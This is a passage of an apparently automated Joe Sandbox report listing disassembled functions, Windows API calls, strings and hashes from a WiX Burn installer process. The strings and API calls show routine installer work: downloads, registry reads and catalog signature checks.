Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: ed9aba0ccca0be061caa1ef38c8ca3cbe44e0b88149eaac4185f4be94793fd99
Instruction ID: d06626d12f5397547d725e64619394398dd0e20184053f85add0442969712f48
Opcode Fuzzy Hash: ed9aba0ccca0be061caa1ef38c8ca3cbe44e0b88149eaac4185f4be94793fd99
Instruction Fuzzy Hash: FE11363290163ABB8B261799CC068EFBEA8FF05B727050115FE10FB710EB64AC0086D2

Function 008A5CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 008A5D68

Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008E112B
Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008E1163

Strings

CommonFilesDir, xrefs: 008A5CF0, 008A5D24, 008A5D33
Failed to read folder path for '%ls'., xrefs: 008A5D34
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 008A5D05
+, xrefs: 008A5CEA
Failed to open Windows folder key., xrefs: 008A5D1A
ProgramFilesDir, xrefs: 008A5CF7
Failed to ensure path was backslash terminated., xrefs: 008A5D52

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: eb4e562cecb5da9ebf65056e84428d22d78bd5708f9c5438b5754e9be5b62080
Instruction ID: 2817e24d950726ffaa10da0dee94a17bed64efc24ba7416d1f61a97092ccba00
Opcode Fuzzy Hash: eb4e562cecb5da9ebf65056e84428d22d78bd5708f9c5438b5754e9be5b62080
Instruction Fuzzy Hash: 070126329006A9B7DB2256999C0AD5E7768FB43720F140125F900FA220D7758E84C691

Function 008CA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008CA33E
GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 008CA348

Strings

Failed to clear readonly bit on payload destination path: %ls, xrefs: 008CA377
download, xrefs: 008CA308
Failed attempt to download URL: '%ls' to: '%ls', xrefs: 008CA425
apply.cpp, xrefs: 008CA36C
:, xrefs: 008CA3C1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: bab75d0a0424be67f39c20c22bae7d933c8342494f4857dc1a0b4f723dafea21
Instruction ID: 4f1c588dafc95720bf0d3a2ab46b698abf49ca5032feca87695d5d8db14f46ab
Opcode Fuzzy Hash: bab75d0a0424be67f39c20c22bae7d933c8342494f4857dc1a0b4f723dafea21
Instruction Fuzzy Hash: 48518C71A0061DABDB15DFA9C891FAEB7B8FF14718F108059E904EB250E375EA40CB92

Function 008E84C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,008C9063,000002C0,00000100), ref: 008E84F5
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,008C9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008E8510

Strings

type, xrefs: 008E8537
apuputil.cpp, xrefs: 008E85AB
http://appsyndication.org/2006/appsyn, xrefs: 008E84E8
application, xrefs: 008E8502

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 2841d71ccae4f9bc5fceee1eda3787e7447d5941ab396bf7b89d0b80c48fce5f
Instruction ID: 7564f879d543904ede8aa90d38c294155d1a2961240646716c15a204ffc1ae44
Opcode Fuzzy Hash: 2841d71ccae4f9bc5fceee1eda3787e7447d5941ab396bf7b89d0b80c48fce5f
Instruction Fuzzy Hash: A551A031644641EFEB209F5ACC85F1A7BA5FB12720F208614FA69EB2E1DF71E9408B51

Function 008E64B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 008E6513
DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008E660A
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008E6619

Strings

DownloadTimeout, xrefs: 008E654C
dlutil.cpp, xrefs: 008E6537
Burn, xrefs: 008E6502
WiX\Burn, xrefs: 008E6551

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 4103c7be6737f03b9be0e696052eb35a25ab54ef9d6fabf34b7d699ddf474355
Instruction ID: f60c40e4635c25147ca1c5e27770af912eb794945cd12bfe5091777866f5d9b0
Opcode Fuzzy Hash: 4103c7be6737f03b9be0e696052eb35a25ab54ef9d6fabf34b7d699ddf474355
Instruction Fuzzy Hash: C3514972D00219BFDF12DFE58C45AAEBBB9FF19750F004165FA14E6160E7318A219BA1

Function 008A9EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9EED
_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9F12

Strings

Failed to format product code string., xrefs: 008A9F1D
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 008AA006
Failed to get component path: %d, xrefs: 008A9F76
Failed to format component id string., xrefs: 008A9EF8
Failed to set variable., xrefs: 008A9FF6

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: ef05311d38d1705e98570a1da90e0fa8d3a645186a8f2c2b75efda7dfbd0b465
Instruction ID: a5a655a81eeb163786faa942b01c14cdc22832e3f4b4bd0061b89681c096c016
Opcode Fuzzy Hash: ef05311d38d1705e98570a1da90e0fa8d3a645186a8f2c2b75efda7dfbd0b465
Instruction Fuzzy Hash: 4241E132908115BEEF259AACCC46FBEB768FB03320F244612F555E2990EB709E50D792

Function 008AF812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 008AF942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 008AF94F

Strings

Failed to format pending restart registry key to read., xrefs: 008AF846
%ls.RebootRequired, xrefs: 008AF82F
Failed to open registration key., xrefs: 008AF8AB
Resume, xrefs: 008AF8B6
Failed to read Resume value., xrefs: 008AF8D8

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 9c54054d6d525da79f427385527592d1c38b9ac8bcfb4ae0ff1b88b8589bc5a1
Instruction ID: d730b1fe386f852219b26bfe4964113197abc7d3f2efd85d1fb1dd9a3382294b
Opcode Fuzzy Hash: 9c54054d6d525da79f427385527592d1c38b9ac8bcfb4ae0ff1b88b8589bc5a1
Instruction Fuzzy Hash: 03416F7190015DFFEF219FE8C8407AEBBA4FB02314F19417AEA10E7612C3759E419B41

Function 008BAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to determine length of source path., xrefs: 008BAA30
Failed to set last source., xrefs: 008BAAF0
WixBundleLastUsedSource, xrefs: 008BAA9F, 008BAAA5, 008BAAE1
Failed to determine length of relative path., xrefs: 008BAA4D
Failed to trim source folder., xrefs: 008BAA95

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 6f267cc270185363c4724902bed4fd29a7360b8bc79da7dd8401d41299b419e0
Instruction ID: 2f4529fa976430fd78cfcf7765462e228a01e0d42e1c9605fc6bed21b71bd1a7
Opcode Fuzzy Hash: 6f267cc270185363c4724902bed4fd29a7360b8bc79da7dd8401d41299b419e0
Instruction Fuzzy Hash: 3A319332900169BBCF269AA8CC45EEEBB79FB41720F214251F920F6390DB719A40D6A1

Function 008CD8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00900C4C,00000000,00000017,00900C5C,?,?,00000000,00000000,?,?,?,?,?,008CDEE7,00000000,00000000), ref: 008CD8E8

Strings

WixBurn, xrefs: 008CD913
Failed to set BITS job to foreground., xrefs: 008CD969
Failed to set progress timeout., xrefs: 008CD952
Failed to set notification flags for BITS job., xrefs: 008CD93A
Failed to create IBackgroundCopyManager., xrefs: 008CD8F4
Failed to create BITS job., xrefs: 008CD922

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: 95c4d6a374fc8f8dca6f535798cdc6e7ec90cfac3bd34c24dbfd07279274b47d
Instruction ID: 57ed13efe5cd4a4e547657281a048af43f8d98412ccac5bfbe4e92ae6dcbfb83
Opcode Fuzzy Hash: 95c4d6a374fc8f8dca6f535798cdc6e7ec90cfac3bd34c24dbfd07279274b47d
Instruction Fuzzy Hash: 9E315E35A4031AAFDB15EBA9C845E6FBBF4FF89714B00016DAA05EB290DA30DC058B91

Function 008E5DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 008E5DF8
GetLastError.KERNEL32 ref: 008E5E05
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 008E5E4C
GetLastError.KERNEL32 ref: 008E5E80
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 008E5EB4

Strings

dlutil.cpp, xrefs: 008E5E29, 008E5EA4
%ls.R, xrefs: 008E5DCC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: %ls.R$dlutil.cpp
API String ID: 3160720760-657863730
Opcode ID: a476f2a6eed498176733e65d42b9db26990c128d6ab73297c573d593d482fcc5
Instruction ID: d2914e43106a3e0079711fca723775ce91c49d8305037e3c592d5c5bcddd7401
Opcode Fuzzy Hash: a476f2a6eed498176733e65d42b9db26990c128d6ab73297c573d593d482fcc5
Instruction Fuzzy Hash: C031D372A41666ABEB308BA58C85B6E7BA4FF06735F114255FE11FB2C0D7709E0086A1

Function 008AC8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008ACD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,008AE444,000000FF,00000000,00000000,008AE444,?,?,008ADBEB,?,?,?,?), ref: 008ACD89

CreateFileW.KERNEL32(E9008EBA,80000000,00000005,00000000,00000003,08000000,00000000,008A53C5,?,00000000,840F01E8,14680A79,00000001,008A53BD,00000000,008A5489), ref: 008AC956
GetLastError.KERNEL32(?,?,?,008B7809,008A566D,008A5479,008A5479,00000000,?,008A5489,FFF9E89D,008A5489,008A54BD,008A5445,?,008A5445), ref: 008AC99B

Strings

Failed to get catalog local file path, xrefs: 008AC9D9
Failed to verify catalog signature: %ls, xrefs: 008AC994
Failed to find payload for catalog file., xrefs: 008AC9E0
Failed to open catalog in working path: %ls, xrefs: 008AC9C9
catalog.cpp, xrefs: 008AC9BC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-48089280
Opcode ID: f486586fa01443caec3a99fd9ffb26fa22bf89260dc41a7226ad452b5dd0fc66
Instruction ID: f76466505333b967ea39b1b171914d03feeca48cc86b218665074c40dd0776b6
Opcode Fuzzy Hash: f486586fa01443caec3a99fd9ffb26fa22bf89260dc41a7226ad452b5dd0fc66
Instruction Fuzzy Hash: 61310732900626BFEB219F59CC42F5ABFA4FF06720F158125FA14EB651E770AD108BD0

Function 008CD33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,008CD642,?), ref: 008CD357
ReleaseMutex.KERNEL32(?,?,?,?,008CD642,?), ref: 008CD375
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008CD3B6
ReleaseMutex.KERNEL32(?), ref: 008CD3CD
SetEvent.KERNEL32(?), ref: 008CD3D6

Strings

Failed to send files in use message from netfx chainer., xrefs: 008CD41C
Failed to get message from netfx chainer., xrefs: 008CD3F7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: ba342b1be53be2d4f69ee1e8d456dc2ee4cb7107cdefeec0e6b456d9fea5074d
Instruction ID: 065dafd73727ec7aced31b8a791c3d971e1195fa7490d4a7f30df5e3df790841
Opcode Fuzzy Hash: ba342b1be53be2d4f69ee1e8d456dc2ee4cb7107cdefeec0e6b456d9fea5074d
Instruction Fuzzy Hash: 9D31B631900755AFCB119F98DC48EAFBBF5FF44320F108269F665E6260C771D9508B91

Function 008E093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008E09AB
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008E09B5
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008E09FE
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008E0A0B

Strings

"%ls" %ls, xrefs: 008E0974
D, xrefs: 008E0993
procutil.cpp, xrefs: 008E09D9

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: 665ea14a7f7c0d5d8d6f752d9b4905992770e0a6f83ff611ae27290f4b09c9d8
Instruction ID: b32240c40e2ef8ec0ec16a52952b150bce5be443dc6fd47cc737e63a3ed49185
Opcode Fuzzy Hash: 665ea14a7f7c0d5d8d6f752d9b4905992770e0a6f83ff611ae27290f4b09c9d8
Instruction Fuzzy Hash: A0214F72D0129EABDB11DFDACD41AAFBBB8FF05714F100425EA00F7252D7B09E508AA1

Function 008A9B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9BB3
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,008AA8AB,00000100,000002C0,000002C0,00000100), ref: 008A9BD3
GetLastError.KERNEL32(?,008AA8AB,00000100,000002C0,000002C0,00000100), ref: 008A9BDE

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 008A9C34
Failed to set directory search path variable., xrefs: 008A9C0F
Failed to format variable string., xrefs: 008A9BBE
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 008A9C4A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: 6518343e6914a37153ca52fd83b97439915311c169228c76f3041566cdd59d7a
Instruction ID: 8a766800c7899c1b153a4ee53b53ca41e583c88497c9c129ee155013084b1aed
Opcode Fuzzy Hash: 6518343e6914a37153ca52fd83b97439915311c169228c76f3041566cdd59d7a
Instruction Fuzzy Hash: DB212633948476F7EB2226998D02B5EBBA8FF12330F200201FD50F65A1D7655E50AAD9

Function 008A9D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008A9D64
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,008AA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 008A9D84
GetLastError.KERNEL32(?,008AA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 008A9D8F

Strings

Failed to format variable string., xrefs: 008A9D6F
Failed to set variable to file search path., xrefs: 008A9DE7
File search: %ls, did not find path: %ls, xrefs: 008A9DF3
Failed while searching file search: %ls, for path: %ls, xrefs: 008A9DBD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: 74538df1bc57b43e1e7f112cfb9ad84d69427115dd273f583cfe55281e172f8f
Instruction ID: 2aef2aeb98662600710980758c9dfd862df942d962a8555a77aec3f6f39ac7e0
Opcode Fuzzy Hash: 74538df1bc57b43e1e7f112cfb9ad84d69427115dd273f583cfe55281e172f8f
Instruction Fuzzy Hash: 6C113533848165BBEF22669DCD02B9DBA64FF02330F200211FD50F6961E7765EA0A6D1

Function 008BCF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?), ref: 008BCF37
GetLastError.KERNEL32(?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 008BCF41
GetExitCodeThread.KERNEL32(00000001,?,?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?,00000000), ref: 008BCF7D
GetLastError.KERNEL32(?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 008BCF87

Strings

Failed to wait for cache thread to terminate., xrefs: 008BCF6F
Failed to get cache thread exit code., xrefs: 008BCFB5
elevation.cpp, xrefs: 008BCF65, 008BCFAB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

